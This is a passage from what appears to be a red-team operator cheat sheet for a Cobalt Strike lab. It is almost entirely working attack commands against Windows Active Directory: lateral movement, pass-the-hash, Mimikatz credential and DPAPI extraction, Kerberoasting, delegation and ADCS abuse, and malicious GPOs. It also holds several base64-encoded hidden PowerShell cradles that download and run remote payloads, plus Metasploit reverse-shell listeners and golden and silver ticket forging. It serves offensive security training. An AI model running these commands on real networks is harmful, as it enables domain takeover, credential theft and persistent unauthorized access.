beacon> steal_token 4464

# Inject beacon into process
beacon> inject 4464 x64 tcp-local

# Shellcode injection
beacon> shinject <pid> x64 /path/to/shellcode.bin

---

Lateral Movement

Jump Methods

Usage: Move laterally using various execution methods.

# Available jump methods
beacon> jump psexec64 <target> <listener>     # SMB-based execution
beacon> jump psexec_psh <target> <listener>   # PowerShell-based execution  
beacon> jump winrm64 <target> <listener>      # WinRM execution

Remote Execution

Usage: Execute payloads on remote systems.

# Remote execution methods
beacon> remote-exec psexec <target> <command>
beacon> remote-exec winrm <target> <command>
beacon> remote-exec wmi <target> <command>

WMI Lateral Movement Example

Usage: Step-by-step WMI-based lateral movement.

# 1. Upload payload to target
beacon> cd \\web.dev.cyberbotic.io\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe

# 2. Execute via WMI
beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe

# 3. Connect to SMB beacon
beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10

Advanced Lateral Movement

Remote .NET Assembly Execution

Usage: Execute .NET assemblies remotely without file upload.

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe OSInfo -ComputerName=web

DCOM Execution (Better OPSEC)

Usage: Use DCOM for stealthier lateral movement.

# Import DCOM script
beacon> powershell-import C:\Tools\Invoke-DCOM.ps1

# Execute via DCOM
beacon> powershell Invoke-DCOM -ComputerName web.dev.cyberbotic.io -Method MMC20.Application -Command C:\Windows\smb_x64.exe

# Connect to beacon
beacon> link web.dev.cyberbotic.io agent_vinod

Note: For remote-exec methods, use Windows service binaries (svc.exe) as they create Windows services for execution.

---

Session Passing

Beacon to Beacon Passing

Usage: Create additional beacon sessions within Cobalt Strike.

# Spawn new HTTP beacon while keeping DNS as lifeline
beacon> spawn x64 http

Foreign Listener (Cobalt Strike to Metasploit)

Usage: Pass session from Cobalt Strike to Metasploit (staged payload - x86 only).

# 1. Setup Metasploit listener
attacker@ubuntu ~> sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST ens5
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > run

# 2. Create Foreign Listener in Cobalt Strike with above IP & port details

# 3. Execute session passing
beacon> jump psexec64 <target> Foreign_listener

Shellcode Injection (Stageless Payload)

Usage: Inject Metasploit shellcode into process memory.

# 1. Setup Metasploit listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST 10.10.5.50
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit

# 2. Generate stageless payload
ubuntu@DESKTOP-3BSK7NO ~> msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.5.50 LPORT=8080 -f raw -o /mnt/c/Payloads/msf_http_x64.bin

# 3. Inject shellcode into new process
beacon> shspawn x64 C:\Payloads\msf_http_x64.bin

---

Pivoting

SOCKS Proxy Setup

Usage: Establish SOCKS proxy for pivoting through compromised hosts.

# Enable SOCKS proxy (SOCKS 5 recommended for better OPSEC)
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging

# Verify proxy on team server
attacker@ubuntu ~> sudo ss -lpnt

# Configure proxychains
$ sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080 socks_user socks_password

# Use proxy for network operations
attacker@ubuntu ~> proxychains nmap -n -Pn -sT -p445,3389,4444,5985 10.10.122.10
ubuntu@DESKTOP-3BSK7NO ~ > proxychains wmiexec.py DEV/jking@10.10.122.30

Windows Pivoting Techniques

Usage: Pivot from Windows systems using various methods.

# Create new logon session with credentials
ps> runas /netonly /user:dev/bfarmer mmc.exe

# Pass-the-hash with Mimikatz
ps> mimikatz # privilege::debug
ps> mimikatz # sekurlsa::pth /domain:DEV /user:bfarmer /ntlm:4ea24377a53e67e78b2bd853974420fc /run:mmc.exe

# PowerShell with credentials
PS C:\Users\Attacker> $cred = Get-Credential
PS C:\Users\Attacker> Get-ADComputer -Server 10.10.122.10 -Filter * -Credential $cred | select

# Browser proxy for web applications (use FoxyProxy plugin)

Reverse Port Forward

Usage: Forward traffic from remote host to team server.

# Setup reverse port forward
beacon> rportfwd 8080 127.0.0.1 80
beacon> run netstat -anp tcp

# Test access from remote host
ps> iwr -Uri http://wkstn-2:8080/a

# Firewall rules for listener
beacon> powershell New-NetFirewallRule -DisplayName "Test Rule" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080
beacon> powershell Remove-NetFirewallRule -DisplayName "Test Rule"

NTLM Relay Setup

Usage: Perform NTLM relay attacks through SOCKS proxy.

# 1. Setup SOCKS proxy on beacon
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging

# 2. Configure proxychains
$ sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080 socks_user socks_password

# 3. Setup NTLM relay
$ sudo proxychains ntlmrelayx.py -t smb://10.10.122.10 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAyADMALgAxADAAMgA6ADgAMAA4ADAALwBiACIAKQA='

# 4. Setup reverse port forwarding
beacon> rportfwd 8080 127.0.0.1 80
beacon> rportfwd 8445 127.0.0.1 445

# 5. Setup PortBender for SMB redirection
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445

# 6. Force authentication (manual access or use print spooler)

# 7. Connect to relayed session
beacon> link dc-2.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10

---

Data Protection API

Windows Vault Enumeration

Usage: Discover and extract credentials from Windows vaults.

# Check for stored credentials
beacon> run vaultcmd /list
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
beacon> run vaultcmd /listcreds:"Web Credentials" /all
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault

# Extract vault credentials with Mimikatz
beacon> mimikatz !vault::list
beacon> mimikatz !vault::cred /patch

Scheduled Task Credentials Extraction

Usage: Extract credentials used by scheduled tasks.

# 1. Locate encrypted credential blobs
beacon> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

# 2. Identify master key GUID for the blob
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E

# 3. Extract master keys from LSASS
beacon> mimikatz !sekurlsa::dpapi

# 4. Decrypt credentials using master key
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:<masterkey>

RDP Credential Extraction

Usage: Extract stored RDP credentials from user profile.

# 1. Enumerate credential files with Seatbelt
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles

# 2. Verify credential blob location
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials

# 3. Locate master key
beacon> ls C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104

# 4. Decrypt master key (execute in user context with @ modifier)
beacon> mimikatz !sekurlsa::dpapi
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc

# 5. Decrypt credential blob
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:<masterkey>

---

Kerberos Attacks

Kerberoasting

Usage: Extract and crack service account passwords.

# 1. Identify kerberoastable accounts
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

# 2. Request service tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap

# 3. Crack the hash
ps> hashcat -a 0 -m 13100 hashes.txt wordlist.txt

ASREPRoast

Usage: Attack accounts with “Do not require Kerberos preauthentication” enabled.

# 1. Identify ASREPRoastable accounts
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

# 2. Request AS-REP without preauth
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap

# 3. Crack the hash
ps> hashcat -a 0 -m 18200 hashes.txt wordlist.txt

Unconstrained Delegation

Usage: Exploit unconstrained delegation to capture TGT tickets.

# 1. Identify computers with unconstrained delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

# 2. Monitor for cached TGT tickets (requires SYSTEM access)
beacon> getuid
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

# 3. Force DC authentication using PrintSpooler
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io

# 4. Extract and use captured DC TGT with S4U
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap

# 5. Create sacrificial logon and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

# 6. Access target resources
beacon> steal_token 2664
beacon> ls \\dc-2.dev.cyberbotic.io\c$

Constrained Delegation

Usage: Abuse constrained delegation to impersonate users.

# 1. Identify computers with constrained delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

# 2. Extract machine TGT
beacon> getuid
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

# 3. Perform S4U attack to impersonate user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap

# 4. Alternative service abuse (if needed)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap

# 5. Inject service ticket and access resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

beacon> steal_token 5540
beacon> ls \\dc-2.dev.cyberbotic.io\c$
beacon> dcsync dev.cyberbotic.io DEV\krbtgt

Resource-Based Constrained Delegation (RBCD)

Usage: Abuse writable msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

# 1. Find computers with writable AllowedToActOnBehalfOfOtherIdentity
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" --attributes dnshostname,samaccountname,msDS-AllowedToActOnBehalfOfOtherIdentity --json

# Alternative: Find computers where we can write this attribute
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

# 2. Resolve SID to identify the principal
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107

# 3. Configure delegation rights
beacon> powerpick Get-DomainComputer -Identity wkstn-2 -Properties objectSid
beacon> powerpick $rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "dc-2" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose

# 4. Verify configuration
beacon> powerpick Get-DomainComputer -Identity "dc-2" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

# 5. Extract our computer's TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

# 6. Perform S4U attack
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /user:WKSTN-2$ /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /ticket:doIFuD[...]5JTw== /nowrap

# 7. Use resulting ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGcD[...]MuaW8=

beacon> steal_token 4092
beacon> ls \\dc-2.dev.cyberbotic.io\c$

# 8. Clean up delegation rights
beacon> powerpick Get-DomainComputer -Identity dc-2 | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity

Alternative: Using Fake Computer Account

Usage: Create fake computer account for RBCD attack.

# 1. Check machine account quota
beacon> powerpick Get-DomainObject -Identity "DC=dev,DC=cyberbotic,DC=io" -Properties ms-DS-MachineAccountQuota

# 2. Create fake computer account
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make

# 3. Generate hash for the fake computer
PS> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe hash /password:<password> /user:EvilComputer$ /domain:dev.cyberbotic.io

# 4. Request TGT for fake computer
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:EvilComputer$ /aes256:<aes256> /nowrap

# Continue with steps 3-8 from above using the fake computer account

---

Active Directory Certificate Services

ADCS Enumeration

Usage: Discover and analyze Certificate Authorities and templates.

# Find Certificate Authorities
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe cas

# Find vulnerable certificate templates
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable

ESC1: ENROLLEE_SUPPLIES_SUBJECT

Usage: Abuse certificate templates allowing subject alternative names.

# 1. Request certificate with alternative name
beacon> getuid
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb

# 2. Convert certificate to PFX format
ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# 3. Encode certificate for Rubeus
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0

# 4. Request TGT using certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:<password> /nowrap

ESC8: NTLM Relay to ADCS HTTP Endpoints

Usage: Relay NTLM authentication to certificate web enrollment endpoints.

# 1. Setup SOCKS proxy
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging

# 2. Configure proxychains
$ sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080 socks_user socks_password

# 3. Setup NTLM relay targeting ADCS
attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

# 4. Setup port redirection
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445

# 5. Force authentication using PrintSpooler
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102

# 6. Use captured certificate for authentication
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /nowrap

# 7. S4U attack with machine certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap

# 8. Access resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

beacon> steal_token 1234
beacon> ls \\web.dev.cyberbotic.io\c$

ADCS Persistence

Usage: Maintain access using certificate-based authentication.

User Certificate Persistence

# 1. Enumerate existing user certificates
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates

# 2. Export user certificates
beacon> mimikatz crypto::certificates /export

# 3. Encode PFX for Rubeus
ubuntu@DESKTOP-3BSK7NO ~> cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0

# 4. Use certificate for authentication
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /enctype:aes256 /nowrap

# 5. Request certificate if not present
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User

Computer Certificate Persistence

# 1. Export machine certificate (requires elevated session)
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export

# 2. Use machine certificate for authentication
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap

# 3. Request machine certificate if needed
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine

---

Group Policy

Modify Existing GPO

Usage: Abuse writable GPO permissions to execute code on target systems.

# 1. Find GPOs with write permissions
beacon> powerpick Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

# 2. Resolve GPO details
beacon> powerpick Get-DomainGPO -Identity "CN={AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" | select displayName, gpcFileSysPath
beacon> powerpick ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
beacon> ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}

# 3. Find target systems
beacon> powerpick Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedName
beacon> powerpick Get-DomainComputer -SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName

# 4. Setup infrastructure for payload delivery
# Create pivot listener and enable firewall rules
beacon> powerpick New-NetFirewallRule -DisplayName "Rule 1" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 1234
beacon> powerpick New-NetFirewallRule -DisplayName "Rule 2" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080
beacon> rportfwd 8080 127.0.0.1 80

# 5. Modify GPO to add scheduled task
beacon> execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "C:\Windows\System32\cmd.exe" --Arguments "/c powershell -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwB3AGsAcwB0AG4ALQAyADoAOAAwADgAMAAvAHAAaQB2AG8AdAAiACkAKQA=" --GPOName "Vulnerable GPO"

Create and Link New GPO

Usage: Create new GPO and link it to organizational units.

# 1. Check GPO creation rights
beacon> powerpick Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

# 2. Find OUs with GP-Link write privileges
beacon> powerpick Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl
beacon> powerpick ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107

# 3. Verify RSAT tools availability
beacon> powerpick Get-Module -List -Name GroupPolicy | select -expand ExportedCommands

# 4. Create and configure new GPO
beacon> powerpick New-GPO -Name "Evil GPO"
beacon> powerpick Find-DomainShare -CheckShareAccess
beacon> cd \\dc-2\software
beacon> upload C:\Payloads\pivot.exe
beacon> powerpick Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\pivot.exe" -Type ExpandString

# 5. Link GPO to target OU
beacon> powerpick Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"

---

MSSQL Servers

MSSQL Enumeration and Access

Usage: Discover and interact with MSSQL instances.

# Import PowerUpSQL for MSSQL enumeration
beacon> powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1

# Discover MSSQL instances
beacon> powerpick Get-SQLInstanceDomain

# Test connectivity
beacon> powerpick Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
beacon> powerpick Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"
beacon> powerpick Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

MSSQL Command Execution

Usage: Execute commands through MSSQL instances.

# Basic query execution
beacon> powerpick Get-SQLQuery -Instance "sql-2.dev.cyberbotic.io,1433" -Query "select @@servername"

# OS command execution via PowerUpSQL
beacon> powerpick Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults

Interactive MSSQL Access

Usage: Direct MSSQL client access for advanced operations.

# Connect using mssqlclient.py through proxy
ubuntu@DESKTOP-3BSK7NO ~> proxychains mssqlclient.py -windows-auth DEV/bfarmer@10.10.122.25 -debug

# Enable xp_cmdshell if disabled
SQL> SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
SQL> sp_configure 'Show Advanced Options', 1; RECONFIGURE;
SQL> sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Execute commands
SQL> EXEC xp_cmdshell 'whoami';
SQL> EXEC xp_cmdshell 'powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBwAGkAdgBvAHQAIgApAA==';

MSSQL Database Links

Usage: Lateral movement through database link trusts.

# Enumerate database links
beacon> powerpick Get-SQLServerLink -Instance "sql-2.dev.cyberbotic.io,1433"
beacon> powerpick Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

# Execute commands through links
beacon> powerpick Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433" -Query "exec master..xp_cmdshell 'whoami'"

# Manual link enumeration and execution
SQL> SELECT * FROM master..sysservers;
SQL> SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
SQL> SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

# Enable xp_cmdshell on linked server
SQL> EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
SQL> EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]

# Execute commands on linked server
SQL> SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAHAAaQB2AG8AdAAyACIAKQA=''')

MSSQL Privilege Escalation

Usage: Escalate from MSSQL service account to SYSTEM.

# Check current privileges
beacon> getuid
beacon> shell whoami /priv
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges

# Use SweetPotato for SeImpersonate privilege escalation
beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAHQAYwBwAC0AbABvAGMAYQBsACIAKQA="

beacon> connect localhost 4444

---

Domain Dominance

Service Requirements for Tickets:

• psexec: CIFS
• winrm: HOST & HTTP
• dcsync (DCs only): LDAP

Silver Ticket (Offline)

Usage: Create service-specific tickets without contacting the DC.

# 1. Extract Kerberos encryption keys
beacon> mimikatz !sekurlsa:ekeys

# 2. Generate silver ticket offline
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:<aes256> /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

# 3. Inject ticket and verify access
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8=
beacon> steal_token 5668
beacon> ls \\wkstn-1.dev.cyberbotic.io\c$

Golden Ticket (Offline)

Usage: Create domain-wide authentication tickets.

# 1. Extract krbtgt account hash
beacon> dcsync dev.cyberbotic.io DEV\krbtgt

# 2. Generate golden ticket offline
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<aes256> /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

# 3. Inject golden ticket and access resources
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

beacon> steal_token 5060
beacon> run klist
beacon> ls \\dc-2.dev.cyberbotic.io\c$

Diamond Ticket (Online)

Usage: Create more legitimate-looking tickets using real TGT templates.

# 1. Get user SID
beacon> powerpick ConvertTo-SID dev/nlamb

# 2. Create diamond ticket (512 = Domain Admins group)
